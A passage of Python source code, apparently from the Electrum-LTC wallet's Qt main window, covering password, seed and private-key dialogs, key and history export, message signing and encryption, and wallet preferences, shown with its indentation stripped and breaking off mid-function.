self.lock_icon = QIcon()
self.password_button = StatusBarButton(self.lock_icon, _("Password"), self.change_password_dialog )
sb.addPermanentWidget(self.password_button)
sb.addPermanentWidget(StatusBarButton(QIcon(":icons/preferences.png"), _("Preferences"), self.settings_dialog ) )
self.seed_button = StatusBarButton(QIcon(":icons/seed.png"), _("Seed"), self.show_seed_dialog )
sb.addPermanentWidget(self.seed_button)
self.status_button = StatusBarButton(QIcon(":icons/status_disconnected.png"), _("Network"), lambda: self.gui_object.show_network_dialog(self))
sb.addPermanentWidget(self.status_button)
run_hook('create_status_bar', sb)
self.setStatusBar(sb)
def update_lock_icon(self):
icon = QIcon(":icons/lock.png") if self.wallet.has_password() else QIcon(":icons/unlock.png")
self.password_button.setIcon(icon)
def update_buttons_on_seed(self):
self.seed_button.setVisible(self.wallet.has_seed())
self.password_button.setVisible(self.wallet.can_change_password())
self.send_button.setVisible(not self.wallet.is_watching_only())
def change_password_dialog(self):
from .password_dialog import ChangePasswordDialog
d = ChangePasswordDialog(self, self.wallet)
ok, password, new_password, encrypt_file = d.run()
if not ok:
return
try:
self.wallet.update_password(password, new_password, encrypt_file)
except BaseException as e:
self.show_error(str(e))
return
except:
traceback.print_exc(file=sys.stdout)
self.show_error(_('Failed to update password'))
return
msg = _('Password was updated successfully') if new_password else _('Password is disabled, this wallet is not protected')
self.show_message(msg, title=_("Success"))
self.update_lock_icon()
def toggle_search(self):
self.search_box.setHidden(not self.search_box.isHidden())
if not self.search_box.isHidden():
self.search_box.setFocus(1)
else:
self.do_search('')
def do_search(self, t):
tab = self.tabs.currentWidget()
if hasattr(tab, 'searchable_list'):
tab.searchable_list.filter(t)
def new_contact_dialog(self):
d = WindowModalDialog(self, _("New Contact"))
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_('New Contact') + ':'))
grid = QGridLayout()
line1 = QLineEdit()
line1.setFixedWidth(280)
line2 = QLineEdit()
line2.setFixedWidth(280)
grid.addWidget(QLabel(_("Address")), 1, 0)
grid.addWidget(line1, 1, 1)
grid.addWidget(QLabel(_("Name")), 2, 0)
grid.addWidget(line2, 2, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if d.exec_():
self.set_contact(line2.text(), line1.text())
def show_master_public_keys(self):
dialog = WindowModalDialog(self, _("Wallet Information"))
dialog.setMinimumSize(500, 100)
mpk_list = self.wallet.get_master_public_keys()
vbox = QVBoxLayout()
wallet_type = self.wallet.storage.get('wallet_type', '')
grid = QGridLayout()
basename = os.path.basename(self.wallet.storage.path)
grid.addWidget(QLabel(_("Wallet name")+ ':'), 0, 0)
grid.addWidget(QLabel(basename), 0, 1)
grid.addWidget(QLabel(_("Wallet type")+ ':'), 1, 0)
grid.addWidget(QLabel(wallet_type), 1, 1)
grid.addWidget(QLabel(_("Script type")+ ':'), 2, 0)
grid.addWidget(QLabel(self.wallet.txin_type), 2, 1)
vbox.addLayout(grid)
if self.wallet.is_deterministic():
mpk_text = ShowQRTextEdit()
mpk_text.setMaximumHeight(150)
mpk_text.addCopyButton(self.app)
def show_mpk(index):
mpk_text.setText(mpk_list[index])
# only show the combobox in case multiple accounts are available
if len(mpk_list) > 1:
def label(key):
if isinstance(self.wallet, Multisig_Wallet):
return _("cosigner") + ' ' + str(key+1)
return ''
labels = [label(i) for i in range(len(mpk_list))]
on_click = lambda clayout: show_mpk(clayout.selected_index())
labels_clayout = ChoicesLayout(_("Master Public Keys"), labels, on_click)
vbox.addLayout(labels_clayout.layout())
else:
vbox.addWidget(QLabel(_("Master Public Key")))
show_mpk(0)
vbox.addWidget(mpk_text)
vbox.addStretch(1)
vbox.addLayout(Buttons(CloseButton(dialog)))
dialog.setLayout(vbox)
dialog.exec_()
def remove_wallet(self):
if self.question('\n'.join([
_('Delete wallet file?'),
"%s"%self.wallet.storage.path,
_('If your wallet contains funds, make sure you have saved its seed.')])):
self._delete_wallet()
@protected
def _delete_wallet(self, password):
wallet_path = self.wallet.storage.path
basename = os.path.basename(wallet_path)
self.gui_object.daemon.stop_wallet(wallet_path)
self.close()
os.unlink(wallet_path)
self.show_error("Wallet removed:" + basename)
@protected
def show_seed_dialog(self, password):
if not self.wallet.has_seed():
self.show_message(_('This wallet has no seed'))
return
keystore = self.wallet.get_keystore()
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except BaseException as e:
self.show_error(str(e))
return
from .seed_dialog import SeedDialog
d = SeedDialog(self, seed, passphrase)
d.exec_()
def show_qrcode(self, data, title = _("QR code"), parent=None):
if not data:
return
d = QRDialog(data, parent or self, title)
d.exec_()
@protected
def show_private_key(self, address, password):
if not address:
return
try:
pk, redeem_script = self.wallet.export_private_key(address, password)
except Exception as e:
traceback.print_exc(file=sys.stdout)
self.show_message(str(e))
return
xtype = bitcoin.deserialize_privkey(pk)[0]
d = WindowModalDialog(self, _("Private key"))
d.setMinimumSize(600, 150)
vbox = QVBoxLayout()
vbox.addWidget(QLabel(_("Address") + ': ' + address))
vbox.addWidget(QLabel(_("Script type") + ': ' + xtype))
vbox.addWidget(QLabel(_("Private key") + ':'))
keys_e = ShowQRTextEdit(text=pk)
keys_e.addCopyButton(self.app)
vbox.addWidget(keys_e)
if redeem_script:
vbox.addWidget(QLabel(_("Redeem Script") + ':'))
rds_e = ShowQRTextEdit(text=redeem_script)
rds_e.addCopyButton(self.app)
vbox.addWidget(rds_e)
if xtype in ['p2wpkh', 'p2wsh', 'p2wpkh-p2sh', 'p2wsh-p2sh']:
vbox.addWidget(WWLabel(_("Warning: the format of private keys associated to segwit addresses may not be compatible with other wallets")))
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
d.exec_()
msg_sign = _("Signing with an address actually means signing with the corresponding "
"private key, and verifying with the corresponding public key. The "
"address you have entered does not have a unique public key, so these "
"operations cannot be performed.") + '\n\n' + \
_('The operation is undefined. Not just in Electrum, but in general.')
@protected
def do_sign(self, address, message, signature, password):
address = address.text().strip()
message = message.toPlainText().strip()
if not bitcoin.is_address(address):
self.show_message(_('Invalid Litecoin address.'))
return
if not self.wallet.is_mine(address):
self.show_message(_('Address not in wallet.'))
return
txin_type = self.wallet.get_txin_type(address)
if txin_type not in ['p2pkh', 'p2wpkh', 'p2wpkh-p2sh']:
self.show_message(_('Cannot sign messages with this type of address:') + \
' ' + txin_type + '\n\n' + self.msg_sign)
return
task = partial(self.wallet.sign_message, address, message, password)
def show_signed_message(sig):
signature.setText(base64.b64encode(sig).decode('ascii'))
self.wallet.thread.add(task, on_success=show_signed_message)
def do_verify(self, address, message, signature):
address = address.text().strip()
message = message.toPlainText().strip().encode('utf-8')
if not bitcoin.is_address(address):
self.show_message(_('Invalid Litecoin address.'))
return
try:
# This can throw on invalid base64
sig = base64.b64decode(str(signature.toPlainText()))
verified = bitcoin.verify_message(address, sig, message)
except Exception as e:
verified = False
if verified:
self.show_message(_("Signature verified"))
else:
self.show_error(_("Wrong signature"))
def sign_verify_message(self, address=''):
d = WindowModalDialog(self, _('Sign/verify Message'))
d.setMinimumSize(610, 290)
layout = QGridLayout(d)
message_e = QTextEdit()
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
address_e = QLineEdit()
address_e.setText(address)
layout.addWidget(QLabel(_('Address')), 2, 0)
layout.addWidget(address_e, 2, 1)
signature_e = QTextEdit()
layout.addWidget(QLabel(_('Signature')), 3, 0)
layout.addWidget(signature_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Sign"))
b.clicked.connect(lambda: self.do_sign(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Verify"))
b.clicked.connect(lambda: self.do_verify(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
@protected
def do_decrypt(self, message_e, pubkey_e, encrypted_e, password):
cyphertext = encrypted_e.toPlainText()
task = partial(self.wallet.decrypt_message, pubkey_e.text(), cyphertext, password)
self.wallet.thread.add(task, on_success=lambda text: message_e.setText(text.decode('utf-8')))
def do_encrypt(self, message_e, pubkey_e, encrypted_e):
message = message_e.toPlainText()
message = message.encode('utf-8')
try:
encrypted = bitcoin.encrypt_message(message, pubkey_e.text())
encrypted_e.setText(encrypted.decode('ascii'))
except BaseException as e:
traceback.print_exc(file=sys.stdout)
self.show_warning(str(e))
def encrypt_message(self, address=''):
d = WindowModalDialog(self, _('Encrypt/decrypt Message'))
d.setMinimumSize(610, 490)
layout = QGridLayout(d)
message_e = QTextEdit()
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
pubkey_e = QLineEdit()
if address:
pubkey = self.wallet.get_public_key(address)
pubkey_e.setText(pubkey)
layout.addWidget(QLabel(_('Public key')), 2, 0)
layout.addWidget(pubkey_e, 2, 1)
encrypted_e = QTextEdit()
layout.addWidget(QLabel(_('Encrypted')), 3, 0)
layout.addWidget(encrypted_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Encrypt"))
b.clicked.connect(lambda: self.do_encrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Decrypt"))
b.clicked.connect(lambda: self.do_decrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
def password_dialog(self, msg=None, parent=None):
from .password_dialog import PasswordDialog
parent = parent or self
d = PasswordDialog(parent, msg)
return d.run()
def tx_from_text(self, txt):
from electrum_ltc.transaction import tx_from_str
try:
tx = tx_from_str(txt)
return Transaction(tx)
except BaseException as e:
self.show_critical(_("Electrum was unable to parse your transaction") + ":\n" + str(e))
return
def read_tx_from_qrcode(self):
from electrum_ltc import qrscanner
try:
data = qrscanner.scan_barcode(self.config.get_video_device())
except BaseException as e:
self.show_error(str(e))
return
if not data:
return
# if the user scanned a bitcoin URI
if str(data).startswith("litecoin:"):
self.pay_to_URI(data)
return
# else if the user scanned an offline signed tx
data = bh2u(bitcoin.base_decode(data, length=None, base=43))
tx = self.tx_from_text(data)
if not tx:
return
self.show_transaction(tx)
def read_tx_from_file(self):
fileName = self.getOpenFileName(_("Select your transaction file"), "*.txn")
if not fileName:
return
try:
with open(fileName, "r") as f:
file_content = f.read()
except (ValueError, IOError, os.error) as reason:
self.show_critical(_("Electrum was unable to open your transaction file") + "\n" + str(reason), title=_("Unable to read file or no transaction found"))
return
return self.tx_from_text(file_content)
def do_process_from_text(self):
from electrum_ltc.transaction import SerializationError
text = text_dialog(self, _('Input raw transaction'), _("Transaction:"), _("Load transaction"))
if not text:
return
try:
tx = self.tx_from_text(text)
if tx:
self.show_transaction(tx)
except SerializationError as e:
self.show_critical(_("Electrum was unable to deserialize the transaction:") + "\n" + str(e))
def do_process_from_file(self):
from electrum_ltc.transaction import SerializationError
try:
tx = self.read_tx_from_file()
if tx:
self.show_transaction(tx)
except SerializationError as e:
self.show_critical(_("Electrum was unable to deserialize the transaction:") + "\n" + str(e))
def do_process_from_txid(self):
from electrum_ltc import transaction
txid, ok = QInputDialog.getText(self, _('Lookup transaction'), _('Transaction ID') + ':')
if ok and txid:
txid = str(txid).strip()
try:
r = self.network.synchronous_get(('blockchain.transaction.get',[txid]))
except BaseException as e:
self.show_message(str(e))
return
tx = transaction.Transaction(r)
self.show_transaction(tx)
@protected
def export_privkeys_dialog(self, password):
if self.wallet.is_watching_only():
self.show_message(_("This is a watching-only wallet"))
return
if isinstance(self.wallet, Multisig_Wallet):
self.show_message(_('WARNING: This is a multi-signature wallet.') + '\n' +
_('It can not be "backed up" by simply exporting these private keys.'))
d = WindowModalDialog(self, _('Private keys'))
d.setMinimumSize(850, 300)
vbox = QVBoxLayout(d)
msg = "%s\n%s\n%s" % (_("WARNING: ALL your private keys are secret."),
_("Exposing a single private key can compromise your entire wallet!"),
_("In particular, DO NOT use 'redeem private key' services proposed by third parties."))
vbox.addWidget(QLabel(msg))
e = QTextEdit()
e.setReadOnly(True)
vbox.addWidget(e)
defaultname = 'electrum-ltc-private-keys.csv'
select_msg = _('Select file to export your private keys to')
hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg)
vbox.addLayout(hbox)
b = OkButton(d, _('Export'))
b.setEnabled(False)
vbox.addLayout(Buttons(CancelButton(d), b))
private_keys = {}
addresses = self.wallet.get_addresses()
done = False
cancelled = False
def privkeys_thread():
for addr in addresses:
time.sleep(0.1)
if done or cancelled:
break
privkey = self.wallet.export_private_key(addr, password)[0]
private_keys[addr] = privkey
self.computing_privkeys_signal.emit()
if not cancelled:
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.emit()
def show_privkeys():
s = "\n".join( map( lambda x: x[0] + "\t"+ x[1], private_keys.items()))
e.setText(s)
b.setEnabled(True)
self.show_privkeys_signal.disconnect()
nonlocal done
done = True
def on_dialog_closed(*args):
nonlocal done
nonlocal cancelled
if not done:
cancelled = True
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.disconnect()
self.computing_privkeys_signal.connect(lambda: e.setText("Please wait... %d/%d"%(len(private_keys),len(addresses))))
self.show_privkeys_signal.connect(show_privkeys)
d.finished.connect(on_dialog_closed)
threading.Thread(target=privkeys_thread).start()
if not d.exec_():
done = True
return
filename = filename_e.text()
if not filename:
return
try:
self.do_export_privkeys(filename, private_keys, csv_button.isChecked())
except (IOError, os.error) as reason:
txt = "\n".join([
_("Electrum was unable to produce a private key-export."),
str(reason)
])
self.show_critical(txt, title=_("Unable to create csv"))
except Exception as e:
self.show_message(str(e))
return
self.show_message(_("Private keys exported."))
def do_export_privkeys(self, fileName, pklist, is_csv):
with open(fileName, "w+") as f:
if is_csv:
transaction = csv.writer(f)
transaction.writerow(["address", "private_key"])
for addr, pk in pklist.items():
transaction.writerow(["%34s"%addr,pk])
else:
import json
f.write(json.dumps(pklist, indent = 4))
def do_import_labels(self):
labelsFile = self.getOpenFileName(_("Open labels file"), "*.json")
if not labelsFile: return
try:
with open(labelsFile, 'r') as f:
data = f.read()
for key, value in json.loads(data).items():
self.wallet.set_label(key, value)
self.show_message(_("Your labels were imported from") + " '%s'" % str(labelsFile))
except (IOError, os.error) as reason:
self.show_critical(_("Electrum was unable to import your labels.") + "\n" + str(reason))
self.address_list.update()
self.history_list.update()
def do_export_labels(self):
labels = self.wallet.labels
try:
fileName = self.getSaveFileName(_("Select file to save your labels"), 'electrum-ltc_labels.json', "*.json")
if fileName:
with open(fileName, 'w+') as f:
json.dump(labels, f, indent=4, sort_keys=True)
self.show_message(_("Your labels were exported to") + " '%s'" % str(fileName))
except (IOError, os.error) as reason:
self.show_critical(_("Electrum was unable to export your labels.") + "\n" + str(reason))
def export_history_dialog(self):
d = WindowModalDialog(self, _('Export History'))
d.setMinimumSize(400, 200)
vbox = QVBoxLayout(d)
defaultname = os.path.expanduser('~/electrum-ltc-history.csv')
select_msg = _('Select file to export your wallet transactions to')
hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg)
vbox.addLayout(hbox)
vbox.addStretch(1)
hbox = Buttons(CancelButton(d), OkButton(d, _('Export')))
vbox.addLayout(hbox)
run_hook('export_history_dialog', self, hbox)
self.update()
if not d.exec_():
return
filename = filename_e.text()
if not filename:
return
try:
self.do_export_history(self.wallet, filename, csv_button.isChecked())
except (IOError, os.error) as reason:
export_error_label = _("Electrum was unable to produce a transaction export.")
self.show_critical(export_error_label + "\n" + str(reason), title=_("Unable to export history"))
return
self.show_message(_("Your wallet history has been successfully exported."))
def plot_history_dialog(self):
if plot_history is None:
return
wallet = self.wallet
history = wallet.get_history()
if len(history) > 0:
plt = plot_history(self.wallet, history)
plt.show()
def do_export_history(self, wallet, fileName, is_csv):
history = wallet.get_history()
lines = []
for item in history:
tx_hash, height, confirmations, timestamp, value, balance = item
if height>0:
if timestamp is not None:
time_string = format_time(timestamp)
else:
time_string = _("unverified")
else:
time_string = _("unconfirmed")
if value is not None:
value_string = format_satoshis(value, True)
else:
value_string = '--'
if tx_hash:
label = wallet.get_label(tx_hash)
else:
label = ""
if is_csv:
lines.append([tx_hash, label, confirmations, value_string, time_string])
else:
lines.append({'txid':tx_hash, 'date':"%16s"%time_string, 'label':label, 'value':value_string})
with open(fileName, "w+") as f:
if is_csv:
transaction = csv.writer(f, lineterminator='\n')
transaction.writerow(["transaction_hash","label", "confirmations", "value", "timestamp"])
for line in lines:
transaction.writerow(line)
else:
import json
f.write(json.dumps(lines, indent = 4))
def sweep_key_dialog(self):
d = WindowModalDialog(self, title=_('Sweep private keys'))
d.setMinimumSize(600, 300)
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_("Enter private keys:")))
keys_e = ScanQRTextEdit(allow_multi=True)
keys_e.setTabChangesFocus(True)
vbox.addWidget(keys_e)
addresses = self.wallet.get_unused_addresses()
if not addresses:
try:
addresses = self.wallet.get_receiving_addresses()
except AttributeError:
addresses = self.wallet.get_addresses()
h, address_e = address_field(addresses)
vbox.addLayout(h)
vbox.addStretch(1)
button = OkButton(d, _('Sweep'))
vbox.addLayout(Buttons(CancelButton(d), button))
button.setEnabled(False)
def get_address():
addr = str(address_e.text()).strip()
if bitcoin.is_address(addr):
return addr
def get_pk():
text = str(keys_e.toPlainText())
return keystore.get_private_keys(text)
f = lambda: button.setEnabled(get_address() is not None and get_pk() is not None)
on_address = lambda text: address_e.setStyleSheet((ColorScheme.DEFAULT if get_address() else ColorScheme.RED).as_stylesheet())
keys_e.textChanged.connect(f)
address_e.textChanged.connect(f)
address_e.textChanged.connect(on_address)
if not d.exec_():
return
from electrum_ltc.wallet import sweep_preparations
try:
self.do_clear()
coins, keypairs = sweep_preparations(get_pk(), self.network)
self.tx_external_keypairs = keypairs
self.spend_coins(coins)
self.payto_e.setText(get_address())
self.spend_max()
self.payto_e.setFrozen(True)
self.amount_e.setFrozen(True)
except BaseException as e:
self.show_message(str(e))
return
self.warn_if_watching_only()
def _do_import(self, title, msg, func):
text = text_dialog(self, title, msg + ' :', _('Import'),
allow_multi=True)
if not text:
return
bad = []
good = []
for key in str(text).split():
try:
addr = func(key)
good.append(addr)
except BaseException as e:
bad.append(key)
continue
if good:
self.show_message(_("The following addresses were added") + ':\n' + '\n'.join(good))
if bad:
self.show_critical(_("The following inputs could not be imported") + ':\n'+ '\n'.join(bad))
self.address_list.update()
self.history_list.update()
def import_addresses(self):
if not self.wallet.can_import_address():
return
title, msg = _('Import addresses'), _("Enter addresses")
self._do_import(title, msg, self.wallet.import_address)
@protected
def do_import_privkey(self, password):
if not self.wallet.can_import_privkey():
return
title, msg = _('Import private keys'), _("Enter private keys")
self._do_import(title, msg, lambda x: self.wallet.import_private_key(x, password))
def update_fiat(self):
b = self.fx and self.fx.is_enabled()
self.fiat_send_e.setVisible(b)
self.fiat_receive_e.setVisible(b)
self.history_list.refresh_headers()
self.history_list.update()
self.address_list.refresh_headers()
self.address_list.update()
self.update_status()
def settings_dialog(self):
self.need_restart = False
d = WindowModalDialog(self, _('Preferences'))
vbox = QVBoxLayout()
tabs = QTabWidget()
gui_widgets = []
fee_widgets = []
tx_widgets = []
id_widgets = []
# language
lang_help = _('Select which language is used in the GUI (after restart).')
lang_label = HelpLabel(_('Language') + ':', lang_help)
lang_combo = QComboBox()
from electrum_ltc.i18n import languages
lang_combo.addItems(list(languages.values()))
try:
index = languages.keys().index(self.config.get("language",''))
except Exception:
index = 0
lang_combo.setCurrentIndex(index)
if not self.config.is_modifiable('language'):
for w in [lang_combo, lang_label]: w.setEnabled(False)
def on_lang(x):
lang_request = list(languages.keys())[lang_combo.currentIndex()]
if lang_request != self.config.get('language'):
self.config.set_key("language", lang_request, True)
self.need_restart = True
lang_combo.currentIndexChanged.connect(on_lang)
gui_widgets.append((lang_label, lang_combo))
nz_help = _('Number of zeros displayed after the decimal point. For example, if this is set to 2, "1." will be displayed as "1.00"')
nz_label = HelpLabel(_('Zeros after decimal point') + ':', nz_help)
nz = QSpinBox()
nz.setMinimum(0)
nz.setMaximum(self.decimal_point)
nz.setValue(self.num_zeros)
if not self.config.is_modifiable('num_zeros'):
for w in [nz, nz_label]: w.setEnabled(False)
def on_nz():
value = nz.value()
if self.num_zeros != value:
self.num_zeros = value
self.config.set_key('num_zeros', value, True)
self.history_list.update()
self.address_list.update()
nz.valueChanged.connect(on_nz)
gui_widgets.append((nz_label, nz))
def on_dynfee(x):
self.config.set_key('dynamic_fees', x == Qt.Checked)
self.fee_slider.update()
dynfee_cb = QCheckBox(_('Use dynamic fees'))
dynfee_cb.setChecked(self.config.is_dynfee())
dynfee_cb.setToolTip(_("Use fees recommended by the server."))
fee_widgets.append((dynfee_cb, None))
dynfee_cb.stateChanged.connect(on_dynfee)
feebox_cb = QCheckBox(_('Edit fees manually'))
feebox_cb.setChecked(self.config.get('show_fee', False))
feebox_cb.setToolTip(_("Show fee edit box in send tab."))
def on_feebox(x):
self.config.set_key('show_fee', x == Qt.Checked)
self.fee_adv_controls.setVisible(bool(x))
feebox_cb.stateChanged.connect(on_feebox)
fee_widgets.append((feebox_cb, None))
use_rbf_cb = QCheckBox(_('Use Replace-By-Fee'))
use_rbf_cb.setChecked(self.config.get('use_rbf', True))
use_rbf_cb.setToolTip(
_('If you check this box, your transactions will be marked as non-final,') + '\n' + \
_('and you will have the possiblity, while they are unconfirmed, to replace them with transactions that pay higher fees.') + '\n' + \
_('Note that some merchants do not accept non-final transactions until they are confirmed.'))
def on_use_rbf(x):
self.config.set_key('use_rbf', x == Qt.Checked)
use_rbf_cb.stateChanged.connect(on_use_rbf)
fee_widgets.append((use_rbf_cb, None))
self.fee_unit = self.config.get('fee_unit', 0)
fee_unit_label = HelpLabel(_('Fee Unit') + ':', '')
fee_unit_combo = QComboBox()
fee_unit_combo.addItems([_('sat/byte'), _('mLTC/kB')])
fee_unit_combo.setCurrentIndex(self.fee_unit)
def on_fee_unit(x):
self.fee_unit = x
self.config.set_key('fee_unit', x)
self.fee_slider.update()
fee_unit_combo.currentIndexChanged.connect(on_fee_unit)
fee_widgets.append((fee_unit_label, fee_unit_combo))
msg = _('OpenAlias record, used to receive coins and to sign payment requests.') + '\n\n'\
+ _('The following alias providers are available:') + '\n'\
+ '\n'.join(['https://cryptoname.co/', 'http://xmr.link']) + '\n\n'\
+ 'For more information, see http://openalias.org'
alias_label = HelpLabel(_('OpenAlias') + ':', msg)
alias = self.config.get('alias','')
alias_e = QLineEdit(alias)
def set_alias_color():
if not self.config.get('alias'):
alias_e.setStyleSheet("")
return
if self.alias_info:
alias_addr, alias_name, validated = self.alias_info
alias_e.setStyleSheet((ColorScheme.GREEN if validated else ColorScheme.RED).as_stylesheet(True))
else:
alias_e.setStyleSheet(ColorScheme.RED.as_stylesheet(True))
def on_alias_edit():
alias_e.setStyleSheet("")
alias = str(alias_e.text())
self.config.set_key('alias', alias, True)
if alias:
self.fetch_alias()
set_alias_color()
self.alias_received_signal.connect(set_alias_color)
alias_e.editingFinished.connect(on_alias_edit)
id_widgets.append((alias_label, alias_e))
# SSL certificate
msg = ' '.join([
_('SSL certificate used to sign payment requests.'),
_('Use setconfig to set ssl_chain and ssl_privkey.'),
])
if self.config.get('ssl_privkey') or self.config.get('ssl_chain'):
try:
SSL_identity = paymentrequest.check_ssl_config(self.config)
SSL_error = None
except BaseException as e:
SSL_identity = "error"
SSL_error = str(e)
else:
SSL_identity = ""
SSL_error = None
SSL_id_label = HelpLabel(_('SSL certificate') + ':', msg)
SSL_id_e = QLineEdit(SSL_identity)
SSL_id_e.setStyleSheet((ColorScheme.RED if SSL_error else ColorScheme.GREEN).as_stylesheet(True) if SSL_identity else '')
if SSL_error:
SSL_id_e.setToolTip(SSL_error)
SSL_id_e.setReadOnly(True)
id_widgets.append((SSL_id_label, SSL_id_e))
units = ['LTC', 'mLTC', 'bits']
msg = _('Base unit of your wallet.')\
+ '\n1LTC=1000mLTC.\n' \
+ _(' These settings affects the fields in the Send tab')+' '
unit_label = HelpLabel(_('Base unit') + ':', msg)
unit_combo = QComboBox()
unit_combo.addItems(units)
unit_combo.setCurrentIndex(units.index(self.base_unit()))
def on_unit(x, nz):
unit_result = units[unit_combo.currentIndex()]
if self.base_unit() == unit_result:
return
edits = self.amount_e, self.fee_e, self.receive_amount_e
amounts = [edit.get_amount() for edit in edits]
if unit_result == 'LTC':
self.decimal_point = 8
elif unit_result == 'mLTC':
self.decimal_point = 5
elif unit_result == 'bits':
self.decimal_point = 2
else:
raise Exception('Unknown base unit')
self.config.set_key('decimal_point', self.decimal_point, True)
nz.setMaximum(self.decimal_point)
self.history_list.update()
self.request_list.update()
self.address_list.update()
for edit, amount in zip(edits, amounts):
edit.setAmount(amount)
self.update_status()
unit_combo.currentIndexChanged.connect(lambda x: on_unit(x, nz))
gui_widgets.append((unit_label, unit_combo))
block_explorers = sorted(util.block_explorer_info().keys())
msg = _('Choose which online block explorer to use for functions that open a web browser')
block_ex_label = HelpLabel(_('Online Block Explorer') + ':', msg)
block_ex_combo = QComboBox()
block_ex_combo.addItems(block_explorers)
block_ex_combo.setCurrentIndex(block_ex_combo.findText(util.block_explorer(self.config)))
def on_be(x):
be_result = block_explorers[block_ex_combo.currentIndex()]
self.config.set_key('block_explorer', be_result, True)
block_ex_combo.currentIndexChanged.connect(on_be)
gui_widgets.append((block_ex_label, block_ex_combo))
from electrum_ltc import qrscanner
system_cameras = qrscanner._find_system_cameras()
qr_combo = QComboBox()
qr_combo.addItem("Default","default")
for camera, device in system_cameras.items():
qr_combo.addItem(camera, device)
#combo.addItem("Manually specify a device", config.get("video_device"))
index = qr_combo.findData(self.config.get("video_device"))
qr_combo.setCurrentIndex(index)
msg = _("Install the zbar package to enable this.")
qr_label = HelpLabel(_('Video Device') + ':', msg)
qr_combo.setEnabled(qrscanner.libzbar is not None)
on_video_device = lambda x: self.config.set_key("video_device", qr_combo.itemData(x), True)
qr_combo.currentIndexChanged.connect(on_video_device)
gui_widgets.append((qr_label, qr_combo))
usechange_cb = QCheckBox(_('Use change addresses'))
usechange_cb.setChecked(self.wallet.use_change)
if not self.config.is_modifiable('use_change'): usechange_cb.setEnabled(False)
def on_usechange(x):
usechange_result = x == Qt.Checked
if self.wallet.use_change != usechange_result:
self.wallet.use_change = usechange_result
self.wallet.storage.put('use_change', self.wallet.use_change)
multiple_cb.setEnabled(self.wallet.use_change)
usechange_cb.stateChanged.connect(on_usechange)
usechange_cb.setToolTip(_('Using change addresses makes it more difficult for other people to track your transactions.'))
tx_widgets.append((usechange_cb, None))
def on_multiple(x):
multiple = x == Qt.Checked
if self.wallet.multiple_change != multiple:
self.wallet.multiple_change = multiple
self.wallet.storage.put('multiple_change', multiple)
multiple_change = self.wallet.multiple_change
multiple_cb = QCheckBox(_('Use multiple change addresses'))
multiple_cb.setEnabled(self.wallet.use_change)
multiple_cb.setToolTip('\n'.join([
_('In some cases, use up to 3 change addresses in order to break '
'up large coin amounts and obfuscate the recipient address.'),
_('This may result in higher transactions fees.')
]))
multiple_cb.setChecked(multiple_change)
multiple_cb.stateChanged.connect(on_multiple)
tx_widgets.append((multiple_cb, None))
def fmt_docs(key, klass):
lines = [ln.lstrip(" ") for ln in klass.__doc__.split("\n")]
return '\n'.join([key, "", " ".join(lines)])
choosers = sorted(coinchooser.COIN_CHOOSERS.keys())
if len(choosers) > 1:
chooser_name = coinchooser.get_name(self.config)
msg = _('Choose coin (UTXO) selection method. The following are available:\n\n')
msg += '\n\n'.join(fmt_docs(*item) for item in coinchooser.COIN_CHOOSERS.items())
chooser_label = HelpLabel(_('Coin selection') + ':', msg)
chooser_combo = QComboBox()
chooser_combo.addItems(choosers)
i = choosers.index(chooser_name) if chooser_name in choosers else 0
chooser_combo.setCurrentIndex(i)
def on_chooser(x):
chooser_name = choosers[chooser_combo.currentIndex()]
self.config.set_key('coin_chooser', chooser_name)
chooser_combo.currentIndexChanged.connect(on_chooser)
tx_widgets.append((chooser_label, chooser_combo))
def on_unconf(x):
self.config.set_key('confirmed_only', bool(x))
conf_only = self.config.get('confirmed_only', False)
unconf_cb = QCheckBox(_('Spend only confirmed coins'))
unconf_cb.setToolTip(_('Spend only confirmed inputs.'))
unconf_cb.setChecked(conf_only)
unconf_cb.stateChanged.connect(on_unconf)
tx_widgets.append((unconf_cb, None))
# Fiat Currency
hist_checkbox = QCheckBox()
fiat_address_checkbox = QCheckBox()
ccy_combo = QComboBox()
ex_combo = QComboBox()
def update_currencies():
if not self.fx: return
currencies = sorted(self.fx.get_currencies(self.fx.get_history_config()))
ccy_combo.clear()
ccy_combo.addItems([_('None')] + currencies)
if self.fx.is_enabled():
ccy_combo.setCurrentIndex(ccy_combo.findText(self.fx.get_currency()))
def update_history_cb():
if not self.fx: return
hist_checkbox.setChecked(self.fx.get_history_config())
hist_checkbox.setEnabled(self.fx.is_enabled())
def update_fiat_address_cb():
if not self.fx: return
fiat_address_checkbox.setChecked(self.fx.get_fiat_address_config())
def update_exchanges():
if not self.fx: return
b = self.fx.is_enabled()
ex_combo.setEnabled(b)
if b:
h = self.fx.get_history_config()
c = self.fx.get_currency()
exchanges = self.fx.get_exchanges_by_ccy(c, h)
else:
exchanges = self.fx.get_exchanges_by_ccy('USD', False)
ex_combo.clear()
ex_combo.addItems(sorted(exchanges))
ex_combo.setCurrentIndex(ex_combo.findText(self.fx.config_exchange()))
def on_currency(hh):
if not self.fx: return
b = bool(ccy_combo.currentIndex())
ccy = str(ccy_combo.currentText()) if b else None
self.fx.set_enabled(b)
if b and ccy != self.fx.ccy:
